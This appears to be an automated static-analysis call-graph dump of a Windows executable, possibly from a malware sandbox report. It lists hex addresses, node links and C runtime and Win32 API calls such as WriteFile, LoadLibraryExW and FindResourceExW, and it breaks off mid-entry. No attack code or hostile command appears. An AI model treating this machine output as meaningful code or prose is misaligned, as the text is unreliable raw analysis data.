12c4ad8 GetFileAttributesW 98803->99261 98808 12ccce9 98805->98808 98811 1267c8e 59 API calls 98808->98811 98809 12ccd17 98812 12ccd2a 98809->98812 98815 1267b52 59 API calls 98809->98815 98811->98791 98814 1269997 84 API calls 98812->98814 98822 12ccd30 98812->98822 98817 12ccd57 98814->98817 98815->98812 99262 12c3833 75 API calls Mailbox 98817->99262 98822->98782 98847->98656 98848->98654 98849->98751 98850->98758 98851->98758 98852->98758 98854 1285522 __write 98853->98854 98855 128554e 98854->98855 98856 1285536 98854->98856 98863 1285546 __write 98855->98863 98866 1286d8e 98855->98866 98888 1288ca8 58 API calls __getptd_noexit 98856->98888 98859 128553b 98889 1288f36 9 API calls __cftof2_l 98859->98889 98863->98763 98867 1286d9e 98866->98867 98868 1286dc0 EnterCriticalSection 98866->98868 98867->98868 98869 1286da6 98867->98869 98870 1285560 98868->98870 98871 1289d8b __lock 58 API calls 98869->98871 98872 12854aa 98870->98872 98871->98870 98873 12854b9 98872->98873 98876 12854cd 98872->98876 98934 1288ca8 58 API calls __getptd_noexit 98873->98934 98875 12854c9 98890 1285585 LeaveCriticalSection LeaveCriticalSection _fprintf 98875->98890 98876->98875 98891 1284bad 98876->98891 98877 12854be 98935 1288f36 9 API calls __cftof2_l 98877->98935 98884 12854e7 98908 1290b82 98884->98908 98886 12854ed 98886->98875 98887 1282ed5 _free 58 API calls 98886->98887 98887->98875 98888->98859 98889->98863 98890->98863 98892 1284bc0 98891->98892 98893 1284be4 98891->98893 98892->98893 98894 1284856 __flswbuf 58 API calls 98892->98894 98897 1290cf7 98893->98897 98895 1284bdd 98894->98895 98936 128da06 98895->98936 98898 12854e1 98897->98898 98899 1290d04 98897->98899 98901 1284856 98898->98901 98899->98898 98900 1282ed5 _free 58 API calls 98899->98900 98900->98898 98902 1284860 98901->98902 98903 1284875 98901->98903 99082 1288ca8 58 API calls __getptd_noexit 98902->99082 98903->98884 98905 1284865 99083 1288f36 9 API calls __cftof2_l 98905->99083 98907 1284870 98907->98884 98909 1290b8e __write 98908->98909 98910 1290b9b 98909->98910 98911 1290bb2 98909->98911 99099 1288c74 58 API calls __getptd_noexit 98910->99099 98912 1290c3d 98911->98912 98914 1290bc2 98911->98914 99104 1288c74 58 API calls __getptd_noexit 98912->99104 98917 1290bea 98914->98917 98918 1290be0 98914->98918 98916 1290ba0 99100 1288ca8 58 API calls __getptd_noexit 98916->99100 98922 128d386 ___lock_fhandle 59 API calls 98917->98922 99101 1288c74 58 API calls __getptd_noexit 98918->99101 98919 1290be5 99105 1288ca8 58 API calls __getptd_noexit 98919->99105 98924 1290bf0 98922->98924 98926 1290c0e 98924->98926 98927 1290c03 98924->98927 98925 1290c49 99106 1288f36 9 API calls __cftof2_l 98925->99106 99102 1288ca8 58 API calls __getptd_noexit 98926->99102 99084 1290c5d 98927->99084 98930 1290ba7 __write 98930->98886 98932 1290c09 99103 1290c35 LeaveCriticalSection __unlock_fhandle 98932->99103 98934->98877 98935->98875 98937 128da12 __write 98936->98937 98938 128da1f 98937->98938 98939 128da36 98937->98939 99037 1288c74 58 API calls __getptd_noexit 98938->99037 98940 128dad5 98939->98940 98943 128da4a 98939->98943 99043 1288c74 58 API calls __getptd_noexit 98940->99043 98942 128da24 99038 1288ca8 58 API calls __getptd_noexit 98942->99038 98946 128da68 98943->98946 98947 128da72 98943->98947 99039 1288c74 58 API calls __getptd_noexit 98946->99039 98964 128d386 98947->98964 98948 128da6d 99044 1288ca8 58 API calls __getptd_noexit 98948->99044 98951 128da78 98953 128da8b 98951->98953 98954 128da9e 98951->98954 98973 128daf5 98953->98973 99040 1288ca8 58 API calls __getptd_noexit 98954->99040 98955 128dae1 99045 1288f36 9 API calls __cftof2_l 98955->99045 98956 128da2b __write 98956->98893 98960 128daa3 99041 1288c74 58 API calls __getptd_noexit 98960->99041 98961 128da97 99042 128dacd LeaveCriticalSection __unlock_fhandle 98961->99042 98965 128d392 __write 98964->98965 98966 128d3e1 EnterCriticalSection 98965->98966 98968 1289d8b __lock 58 API calls 98965->98968 98967 128d407 __write 98966->98967 98967->98951 98969 128d3b7 98968->98969 98970 128d3cf 98969->98970 99046 1289fab InitializeCriticalSectionAndSpinCount 98969->99046 99047 128d40b LeaveCriticalSection _doexit 98970->99047 98974 128db02 __ftell_nolock 98973->98974 98975 128db60 98974->98975 98976 128db41 98974->98976 99006 128db36 98974->99006 98979 128dbb8 98975->98979 98980 128db9c 98975->98980 99057 1288c74 58 API calls __getptd_noexit 98976->99057 98989 128dbd1 98979->98989 99063 1291a41 60 API calls 3 library calls 98979->99063 99060 1288c74 58 API calls __getptd_noexit 98980->99060 98981 128e356 98981->98961 98982 128db46 99058 1288ca8 58 API calls __getptd_noexit 98982->99058 98986 128dba1 99061 1288ca8 58 API calls __getptd_noexit 98986->99061 98988 128db4d 99059 1288f36 9 API calls __cftof2_l 98988->99059 99048 1295deb 98989->99048 98991 128dbdf 98993 128df38 98991->98993 99064 1289b2c 58 API calls 2 library calls 98991->99064 98995 128e2cb WriteFile 98993->98995 98996 128df56 98993->98996 98994 128dba8 99062 1288f36 9 API calls __cftof2_l 98994->99062 98999 128df2b GetLastError 98995->98999 99005 128def8 98995->99005 99000 128e07a 98996->99000 99009 128df6c 98996->99009 98999->99005 99012 128e16f 99000->99012 99014 128e085 99000->99014 99001 128dc0b GetConsoleMode 99001->98993 99003 128dc4a 99001->99003 99002 128e304 99002->99006 99069 1288ca8 58 API calls __getptd_noexit 99002->99069 99003->98993 99007 128dc5a GetConsoleCP 99003->99007 99005->99002 99005->99006 99011 128e058 99005->99011 99071 128c776 99006->99071 99007->99002 99033 128dc89 99007->99033 99008 128dfdb WriteFile 99008->98999 99013 128e018 99008->99013 99009->99002 99009->99008 99010 128e332 99070 1288c74 58 API calls __getptd_noexit 99010->99070 99018 128e2fb 99011->99018 99019 128e063 99011->99019 99012->99002 99020 128e1e4 WideCharToMultiByte 99012->99020 99013->99009 99015 128e03c 99013->99015 99014->99002 99016 128e0ea WriteFile 99014->99016 99015->99005 99016->98999 99021 128e139 99016->99021 99068 1288c87 58 API calls 3 library calls 99018->99068 99066 1288ca8 58 API calls __getptd_noexit 99019->99066 99020->98999 99029 128e22b 99020->99029 99021->99005 99021->99014 99021->99015 99024 128e233 WriteFile 99027 128e286 GetLastError 99024->99027 99024->99029 99025 128e068 99067 1288c74 58 API calls __getptd_noexit 99025->99067 99027->99029 99029->99005 99029->99012 99029->99015 99029->99024 99030 129643a 60 API calls __write_nolock 99030->99033 99031 128dd72 WideCharToMultiByte 99031->99005 99032 128ddad WriteFile 99031->99032 99032->98999 99035 128dddf 99032->99035 99033->99005 99033->99030 99033->99031 99033->99035 99065 1283775 58 API calls __isleadbyte_l 99033->99065 99034 1297bde WriteConsoleW CreateFileW __putwch_nolock 99034->99035 99035->98999 99035->99005 99035->99033 99035->99034 99036 128de07 WriteFile 99035->99036 99036->98999 99036->99035 99037->98942 99038->98956 99039->98948 99040->98960 99041->98961 99042->98956 99043->98948 99044->98955 99045->98956 99046->98970 99047->98966 99049 1295df6 99048->99049 99051 1295e03 99048->99051 99078 1288ca8 58 API calls __getptd_noexit 99049->99078 99054 1295e0f 99051->99054 99079 1288ca8 58 API calls __getptd_noexit 99051->99079 99053 1295dfb 99053->98991 99054->98991 99055 1295e30 99080 1288f36 9 API calls __cftof2_l 99055->99080 99057->98982 99058->98988 99059->99006 99060->98986 99061->98994 99062->99006 99063->98989 99064->99001 99065->99033 99066->99025 99067->99006 99068->99006 99069->99010 99070->99006 99072 128c77e 99071->99072 99073 128c780 IsProcessorFeaturePresent 99071->99073 99072->98981 99075 1295a8a 99073->99075 99081 1295a39 5 API calls ___raise_securityfailure 99075->99081 99077 1295b6d 99077->98981 99078->99053 99079->99055 99080->99053 99081->99077 99082->98905 99083->98907 99107 128d643 99084->99107 99086 1290cc1 99120 128d5bd 59 API calls 2 library calls 99086->99120 99087 1290c6b 99087->99086 99089 128d643 __commit 58 API calls 99087->99089 99098 1290c9f 99087->99098 99092 1290c96 99089->99092 99090 128d643 __commit 58 API calls 99093 1290cab CloseHandle 99090->99093 99091 1290cc9 99094 1290ceb 99091->99094 99121 1288c87 58 API calls 3 library calls 99091->99121 99096 128d643 __commit 58 API calls 99092->99096 99093->99086 99097 1290cb7 GetLastError 99093->99097 99094->98932 99096->99098 99097->99086 99098->99086 99098->99090 99099->98916 99100->98930 99101->98919 99102->98932 99103->98930 99104->98919 99105->98925 99106->98930 99108 128d64e 99107->99108 99110 128d663 99107->99110 99122 1288c74 58 API calls __getptd_noexit 99108->99122 99113 128d688 99110->99113 99124 1288c74 58 API calls __getptd_noexit 99110->99124 99112 128d653 99123 1288ca8 58 API calls __getptd_noexit 99112->99123 99113->99087 99114 128d692 99125 1288ca8 58 API calls __getptd_noexit 99114->99125 99117 128d65b 99117->99087 99118 128d69a 99126 1288f36 9 API calls __cftof2_l 99118->99126 99120->99091 99121->99094 99122->99112 99123->99117 99124->99114 99125->99118 99126->99117 99263 1264d13 99127->99263 99132 129dc3f 99135 1264faa 84 API calls 99132->99135 99133 1264f68 LoadLibraryExW 99273 1264cc8 99133->99273 99137 129dc46 99135->99137 99139 1264cc8 3 API calls 99137->99139 99141 129dc4e 99139->99141 99140 1264f8f 99140->99141 99142 1264f9b 99140->99142 99299 126506b 99141->99299 99143 1264faa 84 API calls 99142->99143 99146 1264fa0 99143->99146 99146->98784 99146->98787 99148 129dc75 99307 1265027 99148->99307 99260->98772 99261->98809 99262->98822 99312 1264d61 99263->99312 99266 1264d3a 99268 1264d53 99266->99268 99269 1264d4a FreeLibrary 99266->99269 99267 1264d61 2 API calls 99267->99266 99270 12853cb 99268->99270 99269->99268 99316 12853e0 99270->99316 99272 1264f5c 99272->99132 99272->99133 99474 1264d94 99273->99474 99276 1264ced 99277 1264cff FreeLibrary 99276->99277 99278 1264d08 99276->99278 99277->99278 99280 1264dd0 99278->99280 99279 1264d94 2 API calls 99279->99276 99281 1280f36 Mailbox 59 API calls 99280->99281 99282 1264de5 99281->99282 99283 126538e 59 API calls 99282->99283 99284 1264df1 _memmove 99283->99284 99285 1264e2c 99284->99285 99286 1264f21 99284->99286 99287 1264ee9 99284->99287 99288 1265027 69 API calls 99285->99288 99489 12c99c4 95 API calls 99286->99489 99478 1264fe9 CreateStreamOnHGlobal 99287->99478 99291 1264e35 99288->99291 99292 126506b 74 API calls 99291->99292 99293 1264ec9 99291->99293 99295 129dc00 99291->99295 99484 1265045 99291->99484 99292->99291 99293->99140 99296 1265045 85 API calls 99295->99296 99297 129dc14 99296->99297 99298 126506b 74 API calls 99297->99298 99298->99293 99300 126507d 99299->99300 99301 129dd26 99299->99301 99507 1285752 99300->99507 99304 12c91b2 99687 12c9008 99304->99687 99306 12c91c8 99306->99148 99308 129dce9 99307->99308 99309 1265036 99307->99309 99692 1285dd0 99309->99692 99313 1264d2e 99312->99313 99314 1264d6a LoadLibraryA 99312->99314 99313->99266 99313->99267 99314->99313 99315 1264d7b GetProcAddress 99314->99315 99315->99313 99319 12853ec __write 99316->99319 99317 12853ff 99365 1288ca8 58 API calls __getptd_noexit 99317->99365 99319->99317 99321 1285430 99319->99321 99320 1285404 99366 1288f36 9 API calls __cftof2_l 99320->99366 99335 1290668 99321->99335 99324 1285435 99325 128544b 99324->99325 99326 128543e 99324->99326 99328 1285475 99325->99328 99329 1285455 99325->99329 99367 1288ca8 58 API calls __getptd_noexit 99326->99367 99350 1290787 99328->99350 99368 1288ca8 58 API calls __getptd_noexit 99329->99368 99330 128540f __write @_EH4_CallFilterFunc@8 99330->99272 99336 1290674 __write 99335->99336 99337 1289d8b __lock 58 API calls 99336->99337 99348 1290682 99337->99348 99338 12906f6 99370 129077e 99338->99370 99339 12906fd 99375 128899d 58 API calls __malloc_crt 99339->99375 99342 1290704 99342->99338 99376 1289fab InitializeCriticalSectionAndSpinCount 99342->99376 99343 1290773 __write 99343->99324 99345 1289e13 __mtinitlocknum 58 API calls 99345->99348 99347 129072a EnterCriticalSection 99347->99338 99348->99338 99348->99339 99348->99345 99373 1286dcd 59 API calls __lock 99348->99373 99374 1286e37 LeaveCriticalSection LeaveCriticalSection _doexit 99348->99374 99359 12907a7 __wopenfile 99350->99359 99351 12907c1 99381 1288ca8 58 API calls __getptd_noexit 99351->99381 99352 129097c 99352->99351 99356 12909df 99352->99356 99354 12907c6 99382 1288f36 9 API calls __cftof2_l 99354->99382 99378 1298721 99356->99378 99357 1285480 99369 12854a2 LeaveCriticalSection LeaveCriticalSection _fprintf 99357->99369 99359->99351 99359->99352 99383 128394b 60 API calls 2 library calls 99359->99383 99361 1290975 99361->99352 99384 128394b 60 API calls 2 library calls 99361->99384 99363 1290994 99363->99352 99385 128394b 60 API calls 2 library calls 99363->99385 99365->99320 99366->99330 99367->99330 99368->99330 99369->99330 99377 1289ef5 LeaveCriticalSection 99370->99377 99372 1290785 99372->99343 99373->99348 99374->99348 99375->99342 99376->99347 99377->99372 99386 1297f05 99378->99386 99380 129873a 99380->99357 99381->99354 99382->99357 99383->99361 99384->99363 99385->99352 99387 1297f11 __write 99386->99387 99388 1297f27 99387->99388 99391 1297f5d 99387->99391 99471 1288ca8 58 API calls __getptd_noexit 99388->99471 99390 1297f2c 99472 1288f36 9 API calls __cftof2_l 99390->99472 99397 1297fce 99391->99397 99394 1297f79 99473 1297fa2 LeaveCriticalSection __unlock_fhandle 99394->99473 99396 1297f36 __write 99396->99380 99398 1297fee 99397->99398 99399 128465a __wsopen_nolock 58 API calls 99398->99399 99402 129800a 99399->99402 99400 1288f46 __invoke_watson 8 API calls 99401 1298720 99400->99401 99403 1297f05 __wsopen_helper 103 API calls 99401->99403 99404 1298044 99402->99404 99410 1298067 99402->99410 99470 1298141 99402->99470 99405 129873a 99403->99405 99406 1288c74 __write 58 API calls 99404->99406 99405->99394 99407 1298049 99406->99407 99408 1288ca8 __cftof2_l 58 API calls 99407->99408 99409 1298056 99408->99409 99412 1288f36 __cftof2_l 9 API calls 99409->99412 99411 1298125 99410->99411 99419 1298103 99410->99419 99413 1288c74 __write 58 API calls 99411->99413 99414 1298060 99412->99414 99415 129812a 99413->99415 99414->99394 99416 1288ca8 __cftof2_l 58 API calls 99415->99416 99417 1298137 99416->99417 99418 1288f36 __cftof2_l 9 API calls 99417->99418 99418->99470 99420 128d414 __alloc_osfhnd 61 API calls 99419->99420 99421 12981d1 99420->99421 99422 12981db 99421->99422 99423 12981fe 99421->99423 99425 1288c74 __write 58 API calls 99422->99425 99424 1297e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99423->99424 99434 1298220 99424->99434 99426 12981e0 99425->99426 99470->99400 99471->99390 99472->99396 99473->99396 99475 1264ce1 99474->99475 99476 1264d9d LoadLibraryA 99474->99476 99475->99276 99475->99279 99476->99475 99477 1264dae GetProcAddress 99476->99477 99477->99475 99479 1265003 FindResourceExW 99478->99479 99483 1265020 99478->99483 99480 129dc8c LoadResource 99479->99480 99479->99483 99481 129dca1 SizeofResource 99480->99481 99480->99483 99482 129dcb5 LockResource 99481->99482 99481->99483 99482->99483 99483->99285 99485 1265054 99484->99485 99486 129dd04 99484->99486 99490 12859bd 99485->99490 99488 1265062 99488->99291 99489->99285 99491 12859c9 __write 99490->99491 99492 12859db 99491->99492 99494 1285a01 99491->99494 99503 1288ca8 58 API calls __getptd_noexit 99492->99503 99496 1286d8e __lock_file 59 API calls 99494->99496 99495 12859e0 99504 1288f36 9 API calls __cftof2_l 99495->99504 99498 1285a07 99496->99498 99505 128592e 83 API calls 5 library calls 99498->99505 99500 1285a16 99506 1285a38 LeaveCriticalSection LeaveCriticalSection _fprintf 99500->99506 99502 12859eb __write 99502->99488 99503->99495 99504->99502 99505->99500 99506->99502 99510 128576d 99507->99510 99509 126508e 99509->99304 99511 1285779 __write 99510->99511 99512 12857bc 99511->99512 99513 12857b4 __write 99511->99513 99515 128578f _memset 99511->99515 99514 1286d8e __lock_file 59 API calls 99512->99514 99513->99509 99517 12857c2 99514->99517 99537 1288ca8 58 API calls __getptd_noexit 99515->99537 99523 128558d 99517->99523 99518 12857a9 99538 1288f36 9 API calls __cftof2_l 99518->99538 99525 12855a8 _memset 99523->99525 99529 12855c3 99523->99529 99524 12855b3 99628 1288ca8 58 API calls __getptd_noexit 99524->99628 99525->99524 99525->99529 99534 1285603 99525->99534 99527 12855b8 99629 1288f36 9 API calls __cftof2_l 99527->99629 99539 12857f6 LeaveCriticalSection LeaveCriticalSection _fprintf 99529->99539 99531 1285714 _memset 99631 1288ca8 58 API calls __getptd_noexit 99531->99631 99532 1284856 __flswbuf 58 API calls 99532->99534 99534->99529 99534->99531 99534->99532 99540 1290fdb 99534->99540 99608 1290d27 99534->99608 99630 1290e48 58 API calls 3 library calls 99534->99630 99537->99518 99538->99513 99539->99513 99541 1290ffc 99540->99541 99542 1291013 99540->99542 99632 1288c74 58 API calls __getptd_noexit 99541->99632 99544 129174b 99542->99544 99548 129104d 99542->99548 99648 1288c74 58 API calls __getptd_noexit 99544->99648 99545 1291001 99633 1288ca8 58 API calls __getptd_noexit 99545->99633 99550 1291055 99548->99550 99556 129106c 99548->99556 99549 1291750 99649 1288ca8 58 API calls __getptd_noexit 99549->99649 99634 1288c74 58 API calls __getptd_noexit 99550->99634 99552 1291061 99650 1288f36 9 API calls __cftof2_l 99552->99650 99554 129105a 99635 1288ca8 58 API calls __getptd_noexit 99554->99635 99557 1291081 99556->99557 99559 129109b 99556->99559 99561 12910b9 99556->99561 99588 1291008 99556->99588 99636 1288c74 58 API calls __getptd_noexit 99557->99636 99559->99557 99565 12910a6 99559->99565 99637 128899d 58 API calls __malloc_crt 99561->99637 99563 12910c9 99566 12910ec 99563->99566 99567 12910d1 99563->99567 99564 1295deb __flswbuf 58 API calls 99568 12911ba 99564->99568 99565->99564 99640 1291a41 60 API calls 3 library calls 99566->99640 99638 1288ca8 58 API calls __getptd_noexit 99567->99638 99570 1291233 ReadFile 99568->99570 99575 12911d0 GetConsoleMode 99568->99575 99573 1291713 GetLastError 99570->99573 99574 1291255 99570->99574 99572 12910d6 99574->99573 99579 1291230 99575->99579 99580 12911e4 99575->99580 99579->99570 99580->99579 99588->99534 99609 1290d32 99608->99609 99613 1290d47 99608->99613 99684 1288ca8 58 API calls __getptd_noexit 99609->99684 99611 1290d37 99685 1288f36 9 API calls __cftof2_l 99611->99685 99614 1290d7c 99613->99614 99621 1290d42 99613->99621 99686 1296164 58 API calls __malloc_crt 99613->99686 99616 1284856 __flswbuf 58 API calls 99614->99616 99617 1290d90 99616->99617 99651 1290ec7 99617->99651 99621->99534 99628->99527 99629->99529 99630->99534 99631->99527 99632->99545 99633->99588 99634->99554 99635->99552 99636->99554 99637->99563 99638->99572 99640->99565 99648->99549 99649->99552 99650->99588 99652 1290ed3 __write 99651->99652 99653 1290ee0 99652->99653 99654 1290ef7 99652->99654 99655 1288c74 __write 58 API calls 99653->99655 99656 1290fbb 99654->99656 99657 1290f0b 99654->99657 99659 1290ee5 99655->99659 99658 1288c74 __write 58 API calls 99656->99658 99660 1290f29 99657->99660 99661 1290f36 99657->99661 99684->99611 99685->99621 99686->99614 99690 128537a GetSystemTimeAsFileTime 99687->99690 99689 12c9017 99689->99306 99691 12853a8 __aulldiv 99690->99691 99691->99689 99693 1285ddc __write 99692->99693 99694 1285dee 99693->99694 99695 1285e03 99693->99695 99706 1288ca8 58 API calls __getptd_noexit 99694->99706 99697 1286d8e __lock_file 59 API calls 99695->99697 99699 1285e09 99697->99699 99698 1285df3 99706->99698 99829 12682ef 99828->99829 99832 126830a 99828->99832 99830 1267faf 59 API calls 99829->99830 99831 12682f7 CharUpperBuffW 99830->99831 99831->99832 99832->98665 99834 126f395 99833->99834 99835 126f3d2 99834->99835 99970 12c9ed4 89 API calls 4 library calls 99834->99970 99835->98705 99838 12684ed 99837->99838 99839 129f116 99837->99839 99840 1280f36 Mailbox 59 API calls 99838->99840 99841 12684f4 99840->99841 99842 1268515 99841->99842 99971 1268794 59 API calls Mailbox 99841->99971 99842->98683 99842->98689 99845 12a501c 99844->99845 99859 1270b55 99844->99859 100015 12c9ed4 89 API calls 4 library calls 99845->100015 99847 1270e5a 99847->98714 99850 1271044 99850->99847 99852 1271051 99850->99852 99851 1270bab PeekMessageW 99919 1270b65 Mailbox 99851->99919 100013 12711f3 331 API calls Mailbox 99852->100013 99854 1271058 LockWindowUpdate DestroyWindow GetMessageW 99854->99847 99857 127108a 99854->99857 99856 12a51da Sleep 99856->99919 99860 12a5fb1 TranslateMessage DispatchMessageW GetMessageW 99857->99860 99858 1270e44 99858->99847 100012 12711d0 10 API calls Mailbox 99858->100012 99859->99919 100016 1269fbd 60 API calls 99859->100016 100017 12b669f 331 API calls 99859->100017 99860->99860 99862 12a5fe1 99860->99862 99862->99847 99863 12a50a9 TranslateAcceleratorW 99865 1270fa3 PeekMessageW 99863->99865 99863->99919 99864 1271005 TranslateMessage DispatchMessageW 99864->99865 99865->99919 99866 1270e73 timeGetTime 99866->99919 99867 12a5b78 WaitForSingleObject 99869 12a5b95 GetExitCodeProcess CloseHandle 99867->99869 99867->99919 99903 12710f5 99869->99903 99870 1270fbf Sleep 99905 1270fd0 Mailbox 99870->99905 99871 12681a7 59 API calls 99871->99919 99872 12677c7 59 API calls 99872->99905 99873 1280f36 59 API calls Mailbox 99873->99919 99874 12a5e51 Sleep 99874->99905 99876 128034a timeGetTime 99876->99905 99878 12710ae timeGetTime 100014 1269fbd 60 API calls 99878->100014 99881 12a5ee8 GetExitCodeProcess 99886 12a5efe WaitForSingleObject 99881->99886 99887 12a5f14 CloseHandle 99881->99887 99882 1269997 84 API calls 99882->99919 99884 12e5f8e 110 API calls 99884->99905 99885 126b93d 109 API calls 99885->99905 99886->99887 99886->99919 99887->99905 99889 12a5bcd 99889->99903 99890 12a5f70 Sleep 99890->99919 99891 12a53d1 Sleep 99891->99919 99893 1267f41 59 API calls 99893->99905 99896 1269fbd 60 API calls 99896->99919 99898 1268b13 69 API calls 99898->99905 99899 126fe40 304 API calls 99899->99919 99901 126f5c0 304 API calls 99901->99919 99902 1267f41 59 API calls 99902->99919 99903->98714 99905->99872 99905->99876 99905->99881 99905->99884 99905->99885 99905->99889 99905->99890 99905->99891 99905->99893 99905->99898 99905->99903 99905->99919 100024 12c2700 60 API calls 99905->100024 100025 1269fbd 60 API calls 99905->100025 100026 126b89c 331 API calls 99905->100026 100027 12b6830 60 API calls 99905->100027 100028 12c52eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99905->100028 100029 12c3c99 66 API calls Mailbox 99905->100029 99907 12c9ed4 89 API calls 99907->99919 99908 1269df0 59 API calls Mailbox 99908->99919 99909 126a000 304 API calls 99909->99919 99910 12b63f2 59 API calls Mailbox 99910->99919 99912 1268620 69 API calls 99912->99919 99913 1268b13 69 API calls 99913->99919 99914 12a592e VariantClear 99914->99919 99915 12b71e5 59 API calls 99915->99919 99916 12a59c4 VariantClear 99916->99919 99917 12a5772 VariantClear 99917->99919 99918 1268e34 59 API calls Mailbox 99918->99919 99919->99851 99919->99856 99919->99858 99919->99863 99919->99864 99919->99865 99919->99866 99919->99867 99919->99870 99919->99871 99919->99873 99919->99874 99919->99878 99919->99882 99919->99896 99919->99899 99919->99901 99919->99902 99919->99903 99919->99905 99919->99907 99919->99908 99919->99909 99919->99910 99919->99912 99919->99913 99919->99914 99919->99915 99919->99916 99919->99917 99919->99918 99920 126b89c 304 API calls 99919->99920 99972 126e580 99919->99972 99980 126e800 99919->99980 100011 12631ce IsDialogMessageW GetClassLongW 99919->100011 100018 12e6081 59 API calls 99919->100018 100019 12c9abe 59 API calls Mailbox 99919->100019 100020 12bd801 59 API calls 99919->100020 100021 12b6363 59 API calls 2 library calls 99919->100021 100022 1268561 59 API calls 99919->100022 100023 126843f 59 API calls Mailbox 99919->100023 99920->99919 99921->98737 99922->98741 99924 12688b3 99923->99924 99925 1268a81 99923->99925 99926 12677c7 59 API calls 99924->99926 99929 12688c4 99924->99929 99925->98735 99927 1268ae3 99926->99927 99928 1282ec0 __cinit 67 API calls 99927->99928 99928->99929 99929->98735 99930->98735 99931->98741 99932->98667 99933->98671 99934->98675 99935->98671 99936->98671 99937->98681 99938->98690 99939->98691 99940->98691 99941->98688 99942->98695 99943->98735 99944->98735 99946 12688a0 68 API calls 99945->99946 99947 1268b23 99946->99947 99948 1268b9d 99947->99948 99949 1268b2d 99947->99949 100043 1269e9c 60 API calls Mailbox 99948->100043 99950 1280f36 Mailbox 59 API calls 99949->99950 99953 1268b3e 99950->99953 99952 1268b8d 99952->98735 99954 1268b4c 99953->99954 99955 12677c7 59 API calls 99953->99955 99956 1268b5b 99954->99956 100041 12680d7 59 API calls 2 library calls 99954->100041 99955->99954 99958 1280f36 Mailbox 59 API calls 99956->99958 99959 1268b65 99958->99959 100042 12687c0 68 API calls 99959->100042 99961->98735 99963 126862b 99962->99963 99964 1268652 99963->99964 99965 1268b13 69 API calls 99963->99965 99964->98720 99965->99964 99966->98671 99967->98721 99968->98730 99969->98671 99970->99835 99971->99842 99973 126e581 99972->99973 99974 126e5b1 99973->99974 99975 126e59d 99973->99975 100031 12c9ed4 89 API calls 4 library calls 99974->100031 100030 126e060 331 API calls 2 library calls 99975->100030 99978 126e5a8 99978->99919 99979 12a3dfd 99979->99979 99981 126e835 99980->99981 99982 12a3e02 99981->99982 99984 126e89f 99981->99984 99994 126e8f9 99981->99994 99983 126a000 331 API calls 99982->99983 99985 12a3e17 99983->99985 99988 12677c7 59 API calls 99984->99988 99984->99994 100010 126ead0 Mailbox 99985->100010 100033 12c9ed4 89 API calls 4 library calls 99985->100033 99986 12677c7 59 API calls 99986->99994 99989 12a3e5d 99988->99989 99992 1282ec0 __cinit 67 API calls 99989->99992 99990 1282ec0 __cinit 67 API calls 99990->99994 99991 12a3e7f 99991->99919 99992->99994 99993 1268620 69 API calls 99993->100010 99994->99986 99994->99990 99994->99991 99996 126eaba 99994->99996 99994->100010 99996->100010 100034 12c9ed4 89 API calls 4 library calls 99996->100034 99997 1268ea0 59 API calls 99997->100010 99998 126f2f5 100038 12c9ed4 89 API calls 4 library calls 99998->100038 100002 126a000 331 API calls 100002->100010 100003 12a417e 100003->99919 100005 12c9ed4 89 API calls 100005->100010 100009 126ebd8 100009->99919 100010->99993 100010->99997 100010->99998 100010->100002 100010->100005 100010->100009 100032 12680d7 59 API calls 2 library calls 100010->100032 100035 12b71e5 59 API calls 100010->100035 100036 12dc6d7 331 API calls 100010->100036 100037 12db651 331 API calls Mailbox 100010->100037 100039 1269df0 59 API calls Mailbox 100010->100039 100040 12d94db 331 API calls Mailbox 100010->100040 100011->99919 100012->99850 100013->99854 100014->99919 100015->99859 100016->99859 100017->99859 100018->99919 100019->99919 100020->99919 100021->99919 100022->99919 100023->99919 100024->99905 100025->99905 100026->99905 100027->99905 100028->99905 100029->99905 100030->99978 100031->99979 100032->100010 100033->100010 100034->100010 100035->100010 100036->100010 100037->100010 100038->100003 100039->100010 100040->100010 100041->99956 100042->99952 100043->99952 100045 12b633f 100044->100045 100046 12b635c 100044->100046 100045->100046 100048 12b631f 59 API calls Mailbox 100045->100048 100046->98219 100048->100045 100049 12a0180 100061 127fac4 100049->100061 100051 12a0196 100052 12a01ac 100051->100052 100053 12a0217 100051->100053 100070 1269fbd 60 API calls 100052->100070 100056 126fe40 331 API calls 100053->100056 100055 12a01eb 100060 12a020b Mailbox 100055->100060 100071 12c83f8 59 API calls Mailbox 100055->100071 100056->100060 100058 12a0c10 Mailbox 100060->100058 100072 12c9ed4 89 API calls 4 library calls 100060->100072 100062 127fae2 100061->100062 100063 127fad0 100061->100063 100064 127fb11 100062->100064 100065 127fae8 100062->100065 100073 1269e9c 60 API calls Mailbox 100063->100073 100074 1269e9c 60 API calls Mailbox 100064->100074 100067 1280f36 Mailbox 59 API calls 100065->100067 100069 127fada 100067->100069 100069->100051 100070->100055 100071->100060 100072->100058 100073->100069 100074->100069 100075 1287dd3 100076 1287ddf __write 100075->100076 100112 1289f88 GetStartupInfoW 100076->100112 100079 1287de4 100114 1288cfc GetProcessHeap 100079->100114 100080 1287e3c 100081 1287e47 100080->100081 100197 1287f23 58 API calls 3 library calls 100080->100197 100115 1289c66 100081->100115 100084 1287e4d 100085 1287e58 __RTC_Initialize 100084->100085 100198 1287f23 58 API calls 3 library calls 100084->100198 100136 128d752 100085->100136 100088 1287e67 100089 1287e73 GetCommandLineW 100088->100089 100199 1287f23 58 API calls 3 library calls 100088->100199 100155 12950a3 GetEnvironmentStringsW 100089->100155 100092 1287e72 100092->100089 100095 1287e8d 100096 1287e98 100095->100096 100200 1283235 58 API calls 3 library calls 100095->100200 100165 1294ed8 100096->100165 100099 1287e9e 100100 1287ea9 100099->100100 100201 1283235 58 API calls 3 library calls 100099->100201 100179 128326f 100100->100179 100103 1287eb1 100104 1287ebc __wwincmdln 100103->100104 100202 1283235 58 API calls 3 library calls 100103->100202 100185 126492e 100104->100185 100107 1287ed0 100108 1287edf 100107->100108 100203 12834d8 58 API calls _doexit 100107->100203 100204 1283260 58 API calls _doexit 100108->100204 100111 1287ee4 __write 100113 1289f9e 100112->100113 100113->100079 100114->100080 100205 1283307 RtlEncodePointer 100115->100205 100117 1289c6b 100211 1289ebc InitializeCriticalSectionAndSpinCount __mtinitlocknum 100117->100211 100119 1289c70 100120 1289c74 100119->100120 100213 1289f0a TlsAlloc 100119->100213 100212 1289cdc 61 API calls 2 library calls 100120->100212 100123 1289c79 100123->100084 100124 1289c86 100124->100120 100125 1289c91 100124->100125 100214 1288955 100125->100214 100127 1289c9e 100128 1289cd3 100127->100128 100220 1289f66 TlsSetValue 100127->100220 100222 1289cdc 61 API calls 2 